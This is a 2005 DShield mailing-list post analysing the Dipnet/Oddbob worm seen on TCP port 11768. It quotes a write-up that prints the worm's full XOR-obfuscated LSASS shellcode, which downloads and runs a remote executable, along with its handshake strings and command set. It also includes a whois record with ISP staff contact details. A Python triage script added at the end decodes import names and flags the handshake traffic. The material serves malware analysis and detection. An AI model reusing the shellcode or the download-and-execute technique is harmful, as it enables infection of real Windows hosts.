[Dshield] port 11768

jayjwa jayjwa at atr2.ath.cx
Fri Jan 14 04:47:56 GMT 2005


On Wed, 12 Jan 2005, Esler, Joel - Contractor wrote:

+ Date: Wed, 12 Jan 2005 09:03:23 -0500
+ From: "Esler, Joel - Contractor" <joel.esler at rcert-s.army.mil>
+ Reply-To: General DShield Discussion List <list at lists.dshield.org>
+ To: General DShield Discussion List <list at lists.dshield.org>
+ Subject: RE: [Dshield] port 11768
+ 
+ I've been on that port for a week now.  I am experiencing the same dump.
+ I have it through tcpdump and netcat, I am not sure really what to make
+ of it.



It's an LSASS-based virus. It connects to 11768 and supposedly another port 
to see if the infected machine is running the newest virus version. The 
site that is serving is in Russia:




% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

inetnum:      82.179.192.0 - 82.179.199.255
netname:      PLUSINFO
descr:        PLUSINFO ISP company
descr:        Podkopaevsky per., 7, str.1
descr:        Moscow, Russia
country:      RU
admin-c:      MU-RIPE
tech-c:       SVK53-RIPE
status:       ASSIGNED PA
notify:       noc at plus.ru
notify:       noc at runnet.ru
mnt-by:       RUNNET-MNT
changed:      als at run.net 20040317
source:       RIPE

route:        82.179.192.0/19
descr:        PlusInfo Moscow
origin:       AS28870
notify:       noc at plus.ru
mnt-by:       RUNNET-MNT
mnt-routes:   PLUSINFO-MNT
changed:      als at run.net 20040409
source:       RIPE

person:       Mikhail A. Ushakov
address:      Strojenie 1, 7, Podkopaevsky per.,
address:      109028, Moscow
address:      Russia
e-mail:       m at plus.ru
phone:        +7 095 9173399
fax-no:       +7 095 9238659
notify:       m at plus.ru
nic-hdl:      MU-RIPE
mnt-by:       RUNNET-MNT
changed:      m at plus.ru 20011227
source:       RIPE

person:       Sergey V Kurlovich
address:      Podkopaevsky per., 7, str.1,
address:      Moscow, Russia
e-mail:       sergey at plus.ru
phone:        +7 095 9173044
fax-no:       +7 095 9238659
notify:       sergey at plus.ru
nic-hdl:      SVK53-RIPE
changed:      sergey at plus.ru 20010710
source:       RIPE




I found this write-up:




Release Date 
January 13, 2005

Dipnet (or Oddbob) is a worm that spreads using the well-known
MS04-011 vulnerability that Sasser was based on. Its purpose is to
spread an IRC DDoS bot. Later variants of Dipnet are causing some
interest due to unusual traffic patterns on TCP port 11768 (and later
on TCP port 15118).

Analysis

Before Dipnet exploits a host, it first attempts to connect
to that host on a chosen TCP port (11768 or 15118) and sends the
string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is
already infected by Dipnet, it will respond with a specific response
encoded in the body of the worm. The latest variant we've seen
responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then
closes the connection. This exchange allows the worm to avoid
infecting hosts that are already running the latest version of the
worm software.

If the worm ascertains that the host is not already infected, or is
not running the latest version, it will then attempt to exploit the
LSASS vulnerability on TCP port 445. The shellcode of the exploit is
self-decrypting, with the bulk of the code XORed by 0xFF in order to
obfuscate the payload strings and prevent null bytes from prematurely
terminating the payload while being copied in memory by the affected
host. When decrypted, the shellcode continues running and downloads
the worm executable from a remote webserver and runs it.

The shellcode as received is as follows:

00000000  eb 00 06 00 eb 00 06 00  9b 00 2a 00 f9 00 77 00  |ë...ë.....*.ù.w.|
00000010  90 00 90 00 90 00 90 00  90 00 90 00 90 00 90 00  |................|
00000020  90 00 33 00 c0 00 f7 00  d0 00 8b 00 fb 00 f2 00  |..3.À.÷.Ð...û.ò.|
00000030  af 00 57 00 33 00 c9 00  b1 00 b2 00 90 00 90 00  |¯.W.3.É.±.².....|
00000040  90 00 90 00 80 00 37 00  ff 00 47 00 e2 00 fa 00  |......7.ÿ.G.â.ú.|
00000050  8b 00 ef 00 4d 00 5f 00  57 00 b8 00 30 00 fa 00  |..ï.M._.W.¸.0.ú.|
00000060  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
00000070  be 00 f8 00 ff 00 ff 00  ff 00 f7 00 d6 00 33 00  |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000090  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
000000a0  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 4e 00  |ÿ.Ð.>...D.µ.ý.N.|
000000b0  0b 00 f6 00 75 00 e3 00  33 00 c0 00 8b 00 c8 00  |..ö.u.ã.3.À...È.|
000000c0  f7 00 d1 00 f2 00 ae 00  57 00 b8 00 30 00 fa 00  |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
000000e0  be 00 f5 00 ff 00 ff 00  ff 00 f7 00 d6 00 ba 00  |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0  f8 00 ff 00 ff 00 ff 00  f7 00 d2 00 52 00 33 00  |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000110  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
00000120  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 5a 00  |ÿ.Ð.>...D.µ.ý.Z.|
00000130  52 00 4e 00 3b 00 f2 00  75 00 e1 00 33 00 c0 00  |R.N.;.ò.u.á.3.À.|
00000140  8b 00 c8 00 f7 00 d1 00  f2 00 ae 00 90 00 90 00  |..È.÷.Ñ.ò.®.....|
00000150  33 00 c0 00 66 00 48 00  d1 00 e0 00 33 00 d2 00  |3.À.f.H.Ñ.à.3.Ò.|
00000160  50 00 52 00 ff 00 55 00  01 00 8b 00 f0 00 33 00  |P.R.ÿ.U.....ð.3.|
00000170  d2 00 52 00 52 00 52 00  52 00 57 00 ff 00 55 00  |Ò.R.R.R.R.W.ÿ.U.|
00000180  25 00 33 00 d2 00 52 00  52 00 52 00 52 00 8b 00  |%.3.Ò.R.R.R.R...|
00000190  d7 00 90 00 90 00 90 00  52 00 50 00 ff 00 55 00  |×.......R.P.ÿ.U.|
000001a0  21 00 57 00 33 00 d2 00  66 00 4a 00 d1 00 e2 00  |!.W.3.Ò.f.J.Ñ.â.|
000001b0  52 00 56 00 50 00 ff 00  55 00 1d 00 90 00 90 00  |R.V.P.ÿ.U.......|
000001c0  90 00 33 00 d2 00 52 00  b8 00 f4 00 ff 00 ff 00  |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0  90 00 90 00 52 00 ff 00  55 00 19 00 ff 00 37 00  |....R.ÿ.U...ÿ.7.|
000001f0  56 00 50 00 8b 00 d8 00  ff 00 55 00 15 00 53 00  |V.P...Ø.ÿ.U...S.|
00000200  ff 00 55 00 11 00 90 00  90 00 90 00 90 00 90 00  |ÿ.U.............|
00000210  33 00 d2 00 42 00 52 00  b8 00 f4 00 ff 00 ff 00  |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230  90 00 90 00 90 00 52 00  ff 00 55 00 09 00 90 00  |......R.ÿ.U.....|
00000240  33 00 d2 00 f7 00 d2 00  c1 00 e2 00 04 00 52 00  |3.Ò.÷.Ò.Á.â...R.|
00000250  ff 00 55 00 05 00 eb 00  f3 00 90 00 87 00 db 00  |ÿ.U...ë.ó.....Û.|
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00  |ÿ.ÿ.ÿ.ÿ.´.º.­.±.|
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00  |º.³.Ì.Í.Ñ.».³.³.|
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00  |ÿ. .............|
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00  |ÿ. .............|
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00  |ÿ.¨.....º.......|
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00  |ÿ.¬.........ÿ.¸.|
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00  |..........¾.....|
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00  |....ÿ.¨.¶.±.¶.±.|
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00  |º.«.Ñ.».³.³.ÿ.¶.|
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00  |..............°.|
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00  |......¾.ÿ.¶.....|
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00  |..........°.....|
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00  |..ª.....¾.ÿ.¶...|
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00  |............­...|
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00  |....¹.......ÿ...|
00000370  8b 00 8b 00 8f 00 c5 00  d0 00 d0 00 9e 00 8b 00  |......Å.Ð.Ð.....|
00000380  93 00 9e 00 91 00 8b 00  9c 00 90 00 92 00 92 00  |................|
00000390  9a 00 8d 00 9c 00 9a 00  d1 00 9c 00 90 00 92 00  |........Ñ.......|
000003a0  d0 00 8c 00 8b 00 8a 00  99 00 99 00 d1 00 9a 00  |Ð...........Ñ...|
000003b0  87 00 9a 00 ff 00 88 00  96 00 91 00 9c 00 9a 00  |....ÿ...........|
000003c0  8d 00 d1 00 9a 00 87 00  9a 00 ff 00 88 00 88 00  |..Ñ.......ÿ.....|
000003d0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003e0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003f0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000400  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000410  88 00 88 00 88 00 88 00  88 00 88 00 ff 00        |............ÿ.|

The shellcode uses InternetOpenA and WinExec Windows API calls to
download and execute a file from a URL. This particular shellcode
downloads the file from:

http://atl<blocked>rce.com/stuff.exe

The worm executable sets up its own listener on the specified port in
order to communicate with future instances of the worm that may
attempt to exploit the host. It also communicates with two different
websites in order to receive additional commands. Commands can be one
of the following:

DIE: delete worm registry keys and exit
DOWNLOAD: download a file via HTTP
EXEC: execute a file
RESET: restart the scanner with a new batch of IP address masks
APPEND: insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges
to scan and exploit. The second website provides the worm with other
malware to download and execute. Finally, the worm begins to scan and
exploit additional hosts based on the IP address masks given.

At the time of this writing, two additional executables were being
served up by the control websites. One is an IRC DDoS bot identified
as Backdoor.Win32.IRCBot.k, the other is a backdoor with a
kernel-level driver that hides the process, known as
Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in
Russia. At the time of this writing the channel had accumulated
between 2800 and 2900 infected hosts.







Even though they censored the URL, they gave the full shellcode AND the 
value it's XOR'ed by ;)


It's there, "stuff.exe". Looking at it now...




--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
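The two pieces of the quoted write-up a sensor operator can act on are the version-check handshake on TCP 11768/15118 and the XOR-by-0xFF obfuscation of the captured shellcode. The script below is an added example, not code from this thread or from the quoted write-up: it labels a captured payload as the scanner's probe or an infected host's reply, and it recovers the obfuscated DLL and function names from the hexdump by dropping the interleaved 0x00 bytes and XORing with 0xFF. It embeds only rows 0x260 to 0x360 of the quoted dump (the name table); the rows that carry the download URL are left out. The reading of the 0x00 after every byte as wide-character delivery is my assumption, as are the function names; the probe and reply strings are the ones the write-up gives.

```python
"""Triage helpers for the Dipnet/Oddbob traffic discussed in the thread.

Added example; this is not code from the DShield thread or from the quoted
write-up. It shows two things a defender can do with what the write-up gives:

  1. label the version-check handshake on TCP 11768/15118 (probe string vs.
     the reply an already-infected host sends), e.g. from a sensor's
     payload captures;
  2. recover the obfuscated import names from the captured shellcode dump by
     dropping the interleaved 0x00 bytes and XORing with 0xFF.

Assumption: the 0x00 after every shellcode byte is read as the payload having
travelled as a wide-character string; the write-up does not say so.
"""
import re

DIPNET_PORTS = {11768, 15118}
# Both strings are quoted from the write-up.
DIPNET_PROBE = b"__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123"
DIPNET_REPLY = b"__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3"
XOR_KEY = 0xFF

# Rows 0x260-0x360 of the hexdump quoted in the thread (ASCII column dropped).
# These rows hold the XOR-obfuscated DLL/function name table; the rows that
# carry the download URL are deliberately not included.
SHELLCODE_DUMP_ROWS = """\
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00
"""


def classify_handshake(listener_port, payload):
    """Label one payload on a Dipnet version-check port.

    listener_port is the port the scanned host listens on (11768 or 15118).
    Returns 'probe' for the scanner's opening string, 'infected-reply' for
    the answer an already-infected host gives back, or None otherwise.
    """
    if listener_port not in DIPNET_PORTS:
        return None
    if payload.startswith(DIPNET_PROBE):
        return "probe"
    if payload.startswith(DIPNET_REPLY):
        return "infected-reply"
    return None


def parse_hexdump(text):
    """Read hexdump-style rows ('offset  hh hh ... [|ascii|]') into bytes."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split("|", 1)[0].split()   # ignore the ASCII column if present
        if len(tokens) < 2 or not re.fullmatch(r"[0-9a-fA-F]{8}", tokens[0]):
            continue                              # not a data row
        for tok in tokens[1:]:
            if not re.fullmatch(r"[0-9a-fA-F]{2}", tok):
                raise ValueError(f"bad byte token {tok!r} in row {tokens[0]}")
            out.append(int(tok, 16))
    return bytes(out)


def strip_wide_padding(raw):
    """Collapse 'xx 00 xx 00 ...' to 'xx xx ...'; refuse input that is not zero-padded."""
    if len(raw) % 2 or any(raw[1::2]):
        raise ValueError("dump is not a zero-padded byte stream")
    return raw[0::2]


def xor_decode(data, key=XOR_KEY):
    """Undo the single-byte XOR the write-up describes (0xFF by default)."""
    return bytes(b ^ key for b in data)


def extract_strings(decoded, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, in order of appearance."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, decoded)]


def recover_import_names(dump_text):
    """Full pipeline: hexdump rows -> bytes -> de-padded -> XOR-decoded -> strings."""
    return extract_strings(xor_decode(strip_wide_padding(parse_hexdump(dump_text))))


if __name__ == "__main__":
    # Constructed sensor records: (listener port, payload).
    for port, payload in [(11768, DIPNET_PROBE), (15118, DIPNET_REPLY),
                          (11768, b"GET / HTTP/1.0\r\n")]:
        print(port, classify_handshake(port, payload))
    for name in recover_import_names(SHELLCODE_DUMP_ROWS):
        print(name)
```

Run as-is, it prints the handshake labels for the constructed records and then the names recovered from the embedded rows; the 0xFF bytes between the names decode to NUL, which is why the decoded table splits cleanly into C strings. Feeding the parser the complete dump from the thread (ASCII column and all) works the same way, since anything after the first `|` on a row is ignored.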

